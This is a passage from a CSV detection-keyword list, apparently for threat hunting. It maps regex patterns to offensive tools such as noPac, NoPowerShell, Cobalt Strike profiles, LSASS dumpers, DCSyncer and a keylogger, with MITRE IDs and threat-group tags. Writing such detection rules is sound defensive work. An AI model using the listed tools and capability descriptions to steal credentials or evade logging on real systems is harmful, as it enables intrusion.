-shell*",".{0,1000}noPac\..{0,1000}\s\-shell.{0,1000}","offensive_tool_keyword","noPac","POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1548 - T1134 - T1078 - T1078.002","TA0004 ","N/A","Dispossessor - Black Basta","Exploitation tool","https://github.com/Ridter/noPac","1","0","N/A","N/A","10","9","862","127","2023-01-29T03:31:27Z","2021-12-13T10:28:12Z","53536" "*noPac.* -shell-type *",".{0,1000}noPac\..{0,1000}\s\-shell\-type\s.{0,1000}","offensive_tool_keyword","noPac","POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1548 - T1134 - T1078 - T1078.002","TA0004 ","N/A","Dispossessor - Black Basta","Exploitation tool","https://github.com/Ridter/noPac","1","0","N/A","N/A","10","9","862","127","2023-01-29T03:31:27Z","2021-12-13T10:28:12Z","53537" "*noPac.* -use-ldap*",".{0,1000}noPac\..{0,1000}\s\-use\-ldap.{0,1000}","offensive_tool_keyword","noPac","POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1548 - T1134 - T1078 - T1078.002","TA0004 ","N/A","Dispossessor - Black Basta","Exploitation tool","https://github.com/Ridter/noPac","1","0","N/A","N/A","10","9","862","127","2023-01-29T03:31:27Z","2021-12-13T10:28:12Z","53538" "*noPac.csproj*",".{0,1000}noPac\.csproj.{0,1000}","offensive_tool_keyword","POC","POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1548 - T1134 - T1078 - T1078.002","TA0004 ","N/A","N/A","Exploitation tool","https://github.com/ricardojba/noPac","1","0","N/A","N/A","N/A","1","36","5","2021-12-19T17:42:12Z","2021-12-13T18:51:31Z","53539" "*noPac.csproj.AssemblyReference.cache*",".{0,1000}noPac\.csproj\.AssemblyReference\.cache.{0,1000}","offensive_tool_keyword","POC","POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1548 - T1134 - T1078 - T1078.002","TA0004 ","N/A","N/A","Exploitation 
tool","https://github.com/ricardojba/noPac","1","0","N/A","N/A","N/A","1","36","5","2021-12-19T17:42:12Z","2021-12-13T18:51:31Z","53540" "*noPac.py*",".{0,1000}noPac\.py.{0,1000}","offensive_tool_keyword","noPac","POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1548 - T1134 - T1078 - T1078.002","TA0004 ","N/A","Dispossessor - Black Basta","Exploitation tool","https://github.com/Ridter/noPac","1","0","N/A","N/A","10","9","862","127","2023-01-29T03:31:27Z","2021-12-13T10:28:12Z","53541" "*noPac.sln*",".{0,1000}noPac\.sln.{0,1000}","offensive_tool_keyword","POC","POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1548 - T1134 - T1078 - T1078.002","TA0004 ","N/A","N/A","Exploitation tool","https://github.com/ricardojba/noPac","1","0","N/A","N/A","N/A","1","36","5","2021-12-19T17:42:12Z","2021-12-13T18:51:31Z","53542" "*nopcorn/DuckDuckC2*",".{0,1000}nopcorn\/DuckDuckC2.{0,1000}","offensive_tool_keyword","DuckDuckC2","A proof-of-concept C2 channel through DuckDuckGo's image proxy service","T1071.001 - T1090.003","TA0011 - TA0042","N/A","N/A","C2","https://github.com/nopcorn/DuckDuckC2","1","1","N/A","N/A","10","10","74","6","2023-11-12T10:24:59Z","2023-09-23T20:00:09Z","53544" "*NoPowerShell.cna*",".{0,1000}NoPowerShell\.cna.{0,1000}","offensive_tool_keyword","C2 related tools","PowerShell rebuilt in C# for Red Teaming purposes","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - 
T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/bitsadmin/nopowershell","1","1","N/A","N/A","10","10","977","138","2025-04-11T09:25:41Z","2018-11-28T21:07:51Z","53545" "*NoPowerShell.cna*",".{0,1000}NoPowerShell\.cna.{0,1000}","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","1","N/A","N/A","10","10","977","138","2025-04-11T09:25:41Z","2018-11-28T21:07:51Z","53546" "*NoPowerShell.Commands*",".{0,1000}NoPowerShell\.Commands.{0,1000}","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. 
An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","N/A","10","10","977","138","2025-04-11T09:25:41Z","2018-11-28T21:07:51Z","53547" "*NoPowerShell.Commands.Management*",".{0,1000}NoPowerShell\.Commands\.Management.{0,1000}","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","N/A","10","10","977","138","2025-04-11T09:25:41Z","2018-11-28T21:07:51Z","53548" "*NoPowerShell.csproj*",".{0,1000}NoPowerShell\.csproj.{0,1000}","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. 
An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","N/A","10","10","977","138","2025-04-11T09:25:41Z","2018-11-28T21:07:51Z","53549" "*NoPowerShell.dll*",".{0,1000}NoPowerShell\.dll.{0,1000}","offensive_tool_keyword","C2 related tools","PowerShell rebuilt in C# for Red Teaming purposes","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/bitsadmin/nopowershell","1","1","N/A","N/A","10","10","977","138","2025-04-11T09:25:41Z","2018-11-28T21:07:51Z","53550" "*NoPowerShell.dll*",".{0,1000}NoPowerShell\.dll.{0,1000}","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. 
No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","1","N/A","N/A","10","10","977","138","2025-04-11T09:25:41Z","2018-11-28T21:07:51Z","53551" "*nopowershell.exe*",".{0,1000}nopowershell\.exe.{0,1000}","offensive_tool_keyword","C2 related tools","PowerShell rebuilt in C# for Red Teaming purposes","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/bitsadmin/nopowershell","1","1","N/A","N/A","10","10","977","138","2025-04-11T09:25:41Z","2018-11-28T21:07:51Z","53552" "*NoPowerShell.exe*",".{0,1000}NoPowerShell\.exe.{0,1000}","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. 
This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","1","N/A","N/A","10","10","977","138","2025-04-11T09:25:41Z","2018-11-28T21:07:51Z","53553" "*NoPowerShell.sln*",".{0,1000}NoPowerShell\.sln.{0,1000}","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","1","N/A","N/A","10","10","977","138","2025-04-11T09:25:41Z","2018-11-28T21:07:51Z","53554" "*NoPowerShell/*.cs*",".{0,1000}NoPowerShell\/.{0,1000}\.cs.{0,1000}","offensive_tool_keyword","C2 related tools","PowerShell rebuilt in C# for Red Teaming purposes","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - 
T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/bitsadmin/nopowershell","1","1","N/A","N/A","10","10","977","138","2025-04-11T09:25:41Z","2018-11-28T21:07:51Z","53555" "*NoPowerShell_trunk.zip*",".{0,1000}NoPowerShell_trunk\.zip.{0,1000}","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","1","N/A","N/A","10","10","977","138","2025-04-11T09:25:41Z","2018-11-28T21:07:51Z","53556" "*NoPowerShell32.dll*",".{0,1000}NoPowerShell32\.dll.{0,1000}","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. 
An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","1","N/A","N/A","10","10","977","138","2025-04-11T09:25:41Z","2018-11-28T21:07:51Z","53557" "*NoPowerShell64.dll*",".{0,1000}NoPowerShell64\.dll.{0,1000}","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","1","N/A","N/A","10","10","977","138","2025-04-11T09:25:41Z","2018-11-28T21:07:51Z","53558" "*NoPowerShellDll.*",".{0,1000}NoPowerShellDll\..{0,1000}","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. 
An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","N/A","10","10","977","138","2025-04-11T09:25:41Z","2018-11-28T21:07:51Z","53559" "*normal/randomized.profile*",".{0,1000}normal\/randomized\.profile.{0,1000}","offensive_tool_keyword","cobaltstrike","Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. These profiles work with Cobalt Strike 3.x","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - 
menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/rsmudge/Malleable-C2-Profiles","1","1","N/A","N/A","10","10","1531","425","2021-05-18T14:45:39Z","2014-07-14T15:02:42Z","53561" "*northdata-get-company-names *",".{0,1000}northdata\-get\-company\-names\s.{0,1000}","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","N/A","7","1","95","10","2025-02-03T12:05:52Z","2021-11-15T13:40:56Z","53562" "*noseyparker report --datastore *",".{0,1000}noseyparker\sreport\s\-\-datastore\s.{0,1000}","offensive_tool_keyword","noseyparker","Nosey Parker is a command-line program that finds secrets and sensitive information in textual data and Git history.","T1583 - T1059.001 - T1059.003","TA0002 - TA0003 - TA0040","N/A","N/A","Credential Access","https://github.com/praetorian-inc/noseyparker","1","0","N/A","N/A","8","10","1903","100","2025-03-07T20:15:34Z","2022-11-08T23:09:17Z","53563" "*noseyparker scan --datastore *",".{0,1000}noseyparker\sscan\s\-\-datastore\s.{0,1000}","offensive_tool_keyword","noseyparker","Nosey Parker is a command-line program that finds secrets and sensitive information in textual data and Git history.","T1583 - T1059.001 - T1059.003","TA0002 - TA0003 - TA0040","N/A","N/A","Credential Access","https://github.com/praetorian-inc/noseyparker","1","0","N/A","N/A","8","10","1903","100","2025-03-07T20:15:34Z","2022-11-08T23:09:17Z","53564" "*noseyparker summarize --datastore *",".{0,1000}noseyparker\ssummarize\s\-\-datastore\s.{0,1000}","offensive_tool_keyword","noseyparker","Nosey Parker is a command-line program that finds secrets and sensitive information in textual data and Git history.","T1583 - T1059.001 - T1059.003","TA0002 - TA0003 - TA0040","N/A","N/A","Credential 
Access","https://github.com/praetorian-inc/noseyparker","1","0","N/A","N/A","8","10","1903","100","2025-03-07T20:15:34Z","2022-11-08T23:09:17Z","53565" "*noseyparker-cli*",".{0,1000}noseyparker\-cli.{0,1000}","offensive_tool_keyword","noseyparker","Nosey Parker is a command-line program that finds secrets and sensitive information in textual data and Git history.","T1583 - T1059.001 - T1059.003","TA0002 - TA0003 - TA0040","N/A","N/A","Credential Access","https://github.com/praetorian-inc/noseyparker","1","1","N/A","N/A","8","10","1903","100","2025-03-07T20:15:34Z","2022-11-08T23:09:17Z","53566" "*noseyparker-main*",".{0,1000}noseyparker\-main.{0,1000}","offensive_tool_keyword","noseyparker","Nosey Parker is a command-line program that finds secrets and sensitive information in textual data and Git history.","T1583 - T1059.001 - T1059.003","TA0002 - TA0003 - TA0040","N/A","N/A","Credential Access","https://github.com/praetorian-inc/noseyparker","1","1","N/A","N/A","8","10","1903","100","2025-03-07T20:15:34Z","2022-11-08T23:09:17Z","53567" "*noseyparker-v*-universal-macos*",".{0,1000}noseyparker\-v.{0,1000}\-universal\-macos.{0,1000}","offensive_tool_keyword","noseyparker","Nosey Parker is a command-line program that finds secrets and sensitive information in textual data and Git history.","T1583 - T1059.001 - T1059.003","TA0002 - TA0003 - TA0040","N/A","N/A","Credential Access","https://github.com/praetorian-inc/noseyparker","1","1","N/A","N/A","8","10","1903","100","2025-03-07T20:15:34Z","2022-11-08T23:09:17Z","53568" "*noseyparker-v*-x86_64-unknown-linux-gnu*",".{0,1000}noseyparker\-v.{0,1000}\-x86_64\-unknown\-linux\-gnu.{0,1000}","offensive_tool_keyword","noseyparker","Nosey Parker is a command-line program that finds secrets and sensitive information in textual data and Git history.","T1583 - T1059.001 - T1059.003","TA0002 - TA0003 - TA0040","N/A","N/A","Credential 
Access","https://github.com/praetorian-inc/noseyparker","1","1","#linux","N/A","8","10","1903","100","2025-03-07T20:15:34Z","2022-11-08T23:09:17Z","53569" "*Nosql-Exploitation-Framework*",".{0,1000}Nosql\-Exploitation\-Framework.{0,1000}","offensive_tool_keyword","Nosql-Exploitation-Framework","A FrameWork For NoSQL Scanning and Exploitation Framework","T1210 - T1211 - T1021 - T1059","TA0002 - TA0011 - TA0003","N/A","N/A","Framework","https://github.com/torque59/Nosql-Exploitation-Framework","1","1","N/A","N/A","N/A","7","601","146","2024-12-06T14:24:45Z","2013-12-26T17:46:11Z","53570" "*NoSQLMap*",".{0,1000}NoSQLMap.{0,1000}","offensive_tool_keyword","NoSQLMap","Automated NoSQL database enumeration and web application exploitation tool.","T1190 - T1210 - T1506","TA0002 - TA0007 - TA0040","N/A","N/A","Framework","https://github.com/codingo/NoSQLMap","1","0","#linux","N/A","N/A","10","3051","589","2024-07-28T00:06:18Z","2013-09-24T15:01:30Z","53571" "*Not in high integrity, unable to MiniDump!*",".{0,1000}Not\sin\shigh\sintegrity,\sunable\sto\sMiniDump!.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","#content","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","53572" "*notdodo/LocalAdminSharp*",".{0,1000}notdodo\/LocalAdminSharp.{0,1000}","offensive_tool_keyword","LocalAdminSharp",".NET executable to use when dealing with privilege escalation on Windows to gain local administrator access","T1055.011 - T1068 - T1548.002 - T1548.003 - T1548.004","TA0004","N/A","N/A","Privilege 
Escalation","https://github.com/notdodo/LocalAdminSharp","1","1","N/A","N/A","10","2","157","17","2022-11-01T17:45:43Z","2022-01-01T10:35:09Z","53573" "*notepad FUZZ*",".{0,1000}notepad\sFUZZ.{0,1000}","offensive_tool_keyword","litefuzz","A multi-platform fuzzer for poking at userland binaries and servers","T1587.004","TA0009","N/A","N/A","Exploitation tool","https://github.com/sec-tools/litefuzz","1","0","N/A","N/A","7","1","68","9","2024-09-15T22:43:02Z","2021-09-17T14:40:07Z","53574" "*Nothing was logged into the temp workingKeyLog!*",".{0,1000}Nothing\swas\slogged\sinto\sthe\stemp\sworkingKeyLog!.{0,1000}","offensive_tool_keyword","peeping-tom","Remote keylogger for Windows written in C++","T1056.001 - T1123 - T1129 - T1113","TA0006 - TA0008 - TA0009","N/A","Dispossessor","Collection","https://github.com/shehzade/peeping-tom","1","0","#content","keylogger","10","1","3","0","2022-07-24T09:31:59Z","2022-04-15T14:16:41Z","53575" "*NotLSASS.zip*",".{0,1000}NotLSASS\.zip.{0,1000}","offensive_tool_keyword","MirrorDump","LSASS dumping tool that uses a dynamically compiled LSA plugin to grab an lsass handle and API hooking for capturing the dump in memory","T1003 - T1055 - T1574","TA0006 - TA0005 - TA0003","N/A","N/A","Credential Access","https://github.com/CCob/MirrorDump","1","0","N/A","N/A","10","3","265","58","2021-03-18T18:19:00Z","2021-03-18T18:18:56Z","53577" "*NotLSASS1.zip*",".{0,1000}NotLSASS1\.zip.{0,1000}","offensive_tool_keyword","MirrorDump","LSASS dumping tool that uses a dynamically compiled LSA plugin to grab an lsass handle and API hooking for capturing the dump in memory","T1003 - T1055 - T1574","TA0006 - TA0005 - TA0003","N/A","N/A","Credential Access","https://github.com/CCob/MirrorDump","1","0","N/A","N/A","10","3","265","58","2021-03-18T18:19:00Z","2021-03-18T18:18:56Z","53578" "*notredamecheatstowin>*",".{0,1000}notredamecheatstowin\>.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection 
capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tool","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","N/A","can be used for data exfiltration simulation","8","7","647","144","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z","53579" "*Notselwyn/CVE-2024-1086*",".{0,1000}Notselwyn\/CVE\-2024\-1086.{0,1000}","offensive_tool_keyword","POC","local privilege escalation Proof-of-Concept exploit for CVE-2024-1086 working on most Linux kernels between v5.14 and v6.6","T1068 - T1548.002","TA0004","N/A","N/A","Privilege Escalation","https://github.com/Notselwyn/CVE-2024-1086","1","1","#linux","CVE-2024-1086 POC","10","10","2357","314","2024-04-17T16:09:54Z","2024-03-20T21:16:41Z","53580" "*Notselwyn/netkit*",".{0,1000}Notselwyn\/netkit.{0,1000}","offensive_tool_keyword","netkit","Netkit is a purposefully small rootkit which can be used by clients over network to maintain a sneaky foothold into a device.","T1547 - T1021 - T1071 - T1562.001 - T1055 - T1041 - T1105","TA0003 - TA0005 - TA0002 - TA0007 - TA0009 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Notselwyn/netkit","1","1","N/A","N/A","10","1","30","7","2024-03-27T19:07:03Z","2023-07-19T00:00:45Z","53581" "*notsoshant/DCSyncer*",".{0,1000}notsoshant\/DCSyncer.{0,1000}","offensive_tool_keyword","DCSyncer","Perform DCSync operation","T1003.006","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/notsoshant/DCSyncer","1","1","N/A","N/A","10","2","143","22","2024-11-05T20:03:27Z","2020-06-06T17:20:22Z","53582" "*novagroup@onionmail.org*",".{0,1000}novagroup\@onionmail\.org.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","#email","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","53583" 
"*NovaLdr-main*",".{0,1000}NovaLdr\-main.{0,1000}","offensive_tool_keyword","NovaLdr","NovaLdr is a Threadless Module Stomping written in Rust designed as a learning project while exploring the world of malware development. It uses advanced techniques like indirect syscalls and string encryption to achieve its functionalities","T1027.001 - T1055.012 - T1112 - T1574.002 - T1055 - T1056.002 - T1027.002 - T1070.004 - T1129","TA0004 - TA0005 - TA0040 - TA0011","N/A","N/A","Defense Evasion","https://github.com/BlackSnufkin/NovaLdr","1","1","N/A","N/A","10","3","242","40","2024-06-29T10:34:48Z","2023-10-19T07:54:39Z","53584" "*novelbfh.zip*",".{0,1000}novelbfh\.zip.{0,1000}","offensive_tool_keyword","novelbfh","Brute force Novell hacking tool -- Circa 1993","T1110","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/nyxgeek/classic_hacking_tools","1","1","N/A","N/A","N/A","1","4","1","2024-06-27T09:35:42Z","2023-04-16T01:49:12Z","53586" "*novnc_proxy --vnc localhost:*",".{0,1000}novnc_proxy\s\-\-vnc\slocalhost\:.{0,1000}","offensive_tool_keyword","EvilnoVNC","EvilnoVNC is a Ready to go Phishing Platform","T1566 - T1110 - T1555 - T1204 - T1592","TA0001 - TA0006 - 